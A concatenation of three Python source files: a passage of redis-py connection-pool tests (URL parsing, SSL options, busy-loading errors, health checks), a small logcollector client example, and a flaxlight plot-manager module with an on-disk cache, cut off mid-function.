When out of connections, block until another connection is released
to the pool
"""
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(
max_connections=1, timeout=2, connection_kwargs=connection_kwargs
)
c1 = pool.get_connection("_")
def target():
time.sleep(0.1)
pool.release(c1)
start = time.time()
Thread(target=target).start()
pool.get_connection("_")
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self, master_host):
connection_kwargs = {"host": master_host[0], "port": master_host[1]}
pool = self.get_pool(connection_kwargs=connection_kwargs)
c1 = pool.get_connection("_")
pool.release(c1)
c2 = pool.get_connection("_")
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(
host="localhost", port=6379, client_name="test-client"
)
expected = (
"ConnectionPool<Connection<"
"host=localhost,port=6379,db=0,client_name=test-client>>"
)
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path="abc",
client_name="test-client",
)
expected = (
"ConnectionPool<UnixDomainSocketConnection<"
"path=abc,db=0,client_name=test-client>>"
)
assert repr(pool) == expected
class TestConnectionPoolURLParsing:
def test_hostname(self):
pool = redis.ConnectionPool.from_url("redis://my.host")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "my.host",
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url("redis://my %2F host %2B%3D+")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "my / host +=+",
}
def test_port(self):
pool = redis.ConnectionPool.from_url("redis://localhost:6380")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"port": 6380,
}
@skip_if_server_version_lt("6.0.0")
def test_username(self):
pool = redis.ConnectionPool.from_url("redis://myuser:@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "myuser",
}
@skip_if_server_version_lt("6.0.0")
def test_quoted_username(self):
pool = redis.ConnectionPool.from_url(
"redis://%2Fmyuser%2F%2B name%3D%24+:@localhost"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "/myuser/+ name=$+",
}
def test_password(self):
pool = redis.ConnectionPool.from_url("redis://:mypassword@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"password": "mypassword",
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
"redis://:%2Fmypass%2F%2B word%3D%24+@localhost"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"password": "/mypass/+ word=$+",
}
@skip_if_server_version_lt("6.0.0")
def test_username_and_password(self):
pool = redis.ConnectionPool.from_url("redis://myuser:mypass@localhost")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"username": "myuser",
"password": "mypass",
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url("redis://localhost", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 1,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url("redis://localhost/2", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 2,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://localhost/2?db=3", db=1)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 3,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
"redis://localhost/2?socket_timeout=20&socket_connect_timeout=10"
"&socket_keepalive=&retry_on_timeout=Yes&max_connections=10"
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
"host": "localhost",
"db": 2,
"socket_timeout": 20.0,
"socket_connect_timeout": 10.0,
"retry_on_timeout": True,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ""),
(False, 0),
(False, "0"),
(False, "f"),
(False, "F"),
(False, "False"),
(False, "n"),
(False, "N"),
(False, "No"),
(True, 1),
(True, "1"),
(True, "y"),
(True, "Y"),
(True, "Yes"),
):
assert expected is to_bool(value)
def test_client_name_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://location?client_name=test-client")
assert pool.connection_kwargs["client_name"] == "test-client"
def test_invalid_extra_typed_querystring_options(self):
with pytest.raises(ValueError):
redis.ConnectionPool.from_url(
"redis://localhost/2?socket_timeout=_&" "socket_connect_timeout=abc"
)
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url("redis://localhost?a=1&b=2")
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {"host": "localhost", "a": "1", "b": "2"}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url("redis://localhost")
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url("redis://myhost")
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
"host": "myhost",
}
def test_invalid_scheme_raises_error(self):
with pytest.raises(ValueError) as cm:
redis.ConnectionPool.from_url("localhost")
assert str(cm.value) == (
"Redis URL must specify one of the following schemes "
"(redis://, rediss://, unix://)"
)
class TestConnectionPoolUnixSocketURLParsing:
def test_defaults(self):
pool = redis.ConnectionPool.from_url("unix:///socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
}
@skip_if_server_version_lt("6.0.0")
def test_username(self):
pool = redis.ConnectionPool.from_url("unix://myuser:@/socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"username": "myuser",
}
@skip_if_server_version_lt("6.0.0")
def test_quoted_username(self):
pool = redis.ConnectionPool.from_url(
"unix://%2Fmyuser%2F%2B name%3D%24+:@/socket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"username": "/myuser/+ name=$+",
}
def test_password(self):
pool = redis.ConnectionPool.from_url("unix://:mypassword@/socket")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"password": "mypassword",
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
"unix://:%2Fmypass%2F%2B word%3D%24+@/socket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"password": "/mypass/+ word=$+",
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
"unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket"
)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/my/path/to/../+_+=$ocket",
"password": "mypassword",
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url("unix:///socket", db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"db": 1,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url("unix:///socket?db=2", db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
"path": "/socket",
"db": 2,
}
def test_client_name_in_querystring(self):
pool = redis.ConnectionPool.from_url("redis://location?client_name=test-client")
assert pool.connection_kwargs["client_name"] == "test-client"
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url("unix:///socket?a=1&b=2")
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {"path": "/socket", "a": "1", "b": "2"}
def test_connection_class_override(self):
class MyConnection(redis.UnixDomainSocketConnection):
pass
pool = redis.ConnectionPool.from_url(
"unix:///socket", connection_class=MyConnection
)
assert pool.connection_class == MyConnection
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
class TestSSLConnectionURLParsing:
def test_host(self):
pool = redis.ConnectionPool.from_url("rediss://my.host")
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
"host": "my.host",
}
def test_connection_class_override(self):
class MyConnection(redis.SSLConnection):
pass
pool = redis.ConnectionPool.from_url(
"rediss://my.host", connection_class=MyConnection
)
assert pool.connection_class == MyConnection
def test_cert_reqs_options(self):
import ssl
class DummyConnectionPool(redis.ConnectionPool):
def get_connection(self, *args, **kwargs):
return self.make_connection()
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=none")
assert pool.get_connection("_").cert_reqs == ssl.CERT_NONE
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=optional")
assert pool.get_connection("_").cert_reqs == ssl.CERT_OPTIONAL
pool = DummyConnectionPool.from_url("rediss://?ssl_cert_reqs=required")
assert pool.get_connection("_").cert_reqs == ssl.CERT_REQUIRED
pool = DummyConnectionPool.from_url("rediss://?ssl_check_hostname=False")
assert pool.get_connection("_").check_hostname is False
pool = DummyConnectionPool.from_url("rediss://?ssl_check_hostname=True")
assert pool.get_connection("_").check_hostname is True
class TestConnection:
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command("DEBUG", "ERROR", "LOADING fake message")
assert not r.connection._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command("DEBUG", "ERROR", "LOADING fake message")
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@pytest.mark.onlynoncluster
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command("DEBUG", "ERROR", "LOADING fake message")
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt("2.8.8")
@skip_if_redis_enterprise()
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command("DEBUG", "ERROR", "READONLY blah blah")
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url("redis://localhost")
pool = connection.connection_pool
assert re.match("(.*)<(.*)<(.*)>>", repr(pool)).groups() == (
"ConnectionPool",
"Connection",
"host=localhost,port=6379,db=0",
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url("unix:///path/to/socket")
pool = connection.connection_pool
assert re.match("(.*)<(.*)<(.*)>>", repr(pool)).groups() == (
"ConnectionPool",
"UnixDomainSocketConnection",
"path=/path/to/socket,db=0",
)
@skip_if_redis_enterprise()
def test_connect_no_auth_supplied_when_required(self, r):
"""
AuthenticationError should be raised when the server requires a
password but one isn't supplied.
"""
with pytest.raises(redis.AuthenticationError):
r.execute_command(
"DEBUG", "ERROR", "ERR Client sent AUTH, but no password is set"
)
@skip_if_redis_enterprise()
def test_connect_invalid_password_supplied(self, r):
"AuthenticationError should be raised when sending the wrong password"
with pytest.raises(redis.AuthenticationError):
r.execute_command("DEBUG", "ERROR", "ERR invalid password")
@pytest.mark.onlynoncluster
class TestMultiConnectionClient:
@pytest.fixture()
def r(self, request):
return _get_client(redis.Redis, request, single_connection_client=False)
def test_multi_connection_command(self, r):
assert not r.connection
assert r.set("a", "123")
assert r.get("a") == b"123"
@pytest.mark.onlynoncluster
class TestHealthCheck:
interval = 60
@pytest.fixture()
def r(self, request):
return _get_client(redis.Redis, request, health_check_interval=self.interval)
def assert_interval_advanced(self, connection):
diff = connection.next_health_check - time.time()
assert self.interval > diff > (self.interval - 1)
def test_health_check_runs(self, r):
r.connection.next_health_check = time.time() - 1
r.connection.check_health()
self.assert_interval_advanced(r.connection)
def test_arbitrary_command_invokes_health_check(self, r):
# invoke a command to make sure the connection is entirely setup
r.get("foo")
r.connection.next_health_check = time.time()
with mock.patch.object(
r.connection, "send_command", wraps=r.connection.send_command
) as m:
r.get("foo")
m.assert_called_with("PING", check_health=False)
self.assert_interval_advanced(r.connection)
def test_arbitrary_command_advances_next_health_check(self, r):
r.get("foo")
next_health_check = r.connection.next_health_check
r.get("foo")
assert next_health_check < r.connection.next_health_check
def test_health_check_not_invoked_within_interval(self, r):
r.get("foo")
with mock.patch.object(
r.connection, "send_command", wraps=r.connection.send_command
) as m:
r.get("foo")
ping_call_spec = (("PING",), {"check_health": False})
assert ping_call_spec not in m.call_args_list
def test_health_check_in_pipeline(self, r):
with r.pipeline(transaction=False) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
responses = pipe.set("foo", "bar").get("foo").execute()
m.assert_any_call("PING", check_health=False)
assert responses == [True, b"bar"]
def test_health_check_in_transaction(self, r):
with r.pipeline(transaction=True) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
responses = pipe.set("foo", "bar").get("foo").execute()
m.assert_any_call("PING", check_health=False)
assert responses == [True, b"bar"]
def test_health_check_in_watched_pipeline(self, r):
r.set("foo", "bar")
with r.pipeline(transaction=False) as pipe:
pipe.connection = pipe.connection_pool.get_connection("_")
pipe.connection.next_health_check = 0
with mock.patch.object(
pipe.connection, "send_command", wraps=pipe.connection.send_command
) as m:
pipe.watch("foo")
# the health check should be called when watching
m.assert_called_with("PING", check_health=False)
self.assert_interval_advanced(pipe.connection)
assert pipe.get("foo") == b"bar"
# reset the mock to clear the call list and schedule another
# health check
m.reset_mock()
pipe.connection.next_health_check = 0
pipe.multi()
responses = pipe.set("foo", "not-bar").get("foo").execute()
assert responses == [True, b"not-bar"]
m.assert_any_call("PING", check_health=False)
def test_health_check_in_pubsub_before_subscribe(self, r):
"A health check happens before the first [p]subscribe"
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
p.connection.next_health_check = 0
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
assert not p.subscribed
p.subscribe("foo")
# the connection is not yet in pubsub mode, so the normal
# ping/pong within connection.send_command should check
# the health of the connection
m.assert_any_call("PING", check_health=False)
self.assert_interval_advanced(p.connection)
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
def test_health_check_in_pubsub_after_subscribed(self, r):
"""
Pubsub can handle a new subscribe when it's time to check the
connection health
"""
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
p.connection.next_health_check = 0
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
p.subscribe("foo")
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
self.assert_interval_advanced(p.connection)
# because we weren't subscribed when sending the subscribe
# message to 'foo', the connection's standard check_health ran
# prior to subscribing.
m.assert_any_call("PING", check_health=False)
p.connection.next_health_check = 0
m.reset_mock()
p.subscribe("bar")
# the second subscribe issues exactly only command (the subscribe)
# and the health check is not invoked
m.assert_called_once_with("SUBSCRIBE", "bar", check_health=False)
# since no message has been read since the health check was
# reset, it should still be 0
assert p.connection.next_health_check == 0
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
assert wait_for_message(p) is None
# now that the connection is subscribed, the pubsub health
# check should have taken over and include the HEALTH_CHECK_MESSAGE
m.assert_any_call("PING", p.HEALTH_CHECK_MESSAGE, check_health=False)
self.assert_interval_advanced(p.connection)
def test_health_check_in_pubsub_poll(self, r):
"""
Polling a pubsub connection that's subscribed will regularly
check the connection's health.
"""
p = r.pubsub()
p.connection = p.connection_pool.get_connection("_")
with mock.patch.object(
p.connection, "send_command", wraps=p.connection.send_command
) as m:
p.subscribe("foo")
subscribe_message = wait_for_message(p)
assert subscribe_message["type"] == "subscribe"
self.assert_interval_advanced(p.connection)
# polling the connection before the health check interval
# doesn't result in another health check
m.reset_mock()
next_health_check = p.connection.next_health_check
assert wait_for_message(p) is None
assert p.connection.next_health_check == next_health_check
m.assert_not_called()
# reset the health check and poll again
# we should not receive a pong message, but the next_health_check
# should be advanced
p.connection.next_health_check = 0
assert wait_for_message(p) is None
m.assert_called_with("PING", p.HEALTH_CHECK_MESSAGE, check_health=False)
self.assert_interval_advanced(p.connection)
|
example_client.py
|
from __future__ import print_function
import os
import sys
import time
import logging
import threading
from functools import partial
from logcollector.client_utils import make_log_collecting_decorator
def main():
# logger name is not important; root logger (and above) is monitored.
logger = logging.getLogger('simpletest')
# logger level still matters as usual
logger.setLevel(logging.INFO)
# So we also see the output on the client console
logger.addHandler(logging.StreamHandler(sys.stdout))
SERVER = '127.0.0.1'
PORT = 3000
# Make a decorator with server and port already bound
send_log_with_key = make_log_collecting_decorator(SERVER, PORT)
@send_log_with_key(lambda task_key, *args, **kwargs: task_key)
def do_some_stuff(task_key, other_param, other_param2):
print("STARTING task {}...".format(task_key))
N_MSG = 30
for i in range(30):
time.sleep(1.0)
logger.info("Task {}:({}) Test message {}: with args: %s, %d".format(task_key, threading.current_thread().ident, i ),
'hi', 42, extra={'status': '{:.1f}'.format(100.*(i+1)/N_MSG)})
print("DONE.")
threads = []
for i in range(100):
# Use i as the 'task_key'
func = partial(do_some_stuff, '{:03d}'.format(i), 'foo', 'bar')
threads.append(threading.Thread(target=func))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from flaxlight.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from flaxlight.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from flaxlight.util.ints import uint16
from flaxlight.util.path import mkdir
from flaxlight.util.streamable import Streamable, streamable
from flaxlight.types.blockchain_format.proof_of_space import ProofOfSpace
from flaxlight.types.blockchain_format.sized_bytes import bytes32
from flaxlight.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.removed += batch_result.removed
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if not file_path.exists():
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
with self.plot_filename_paths_lock:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
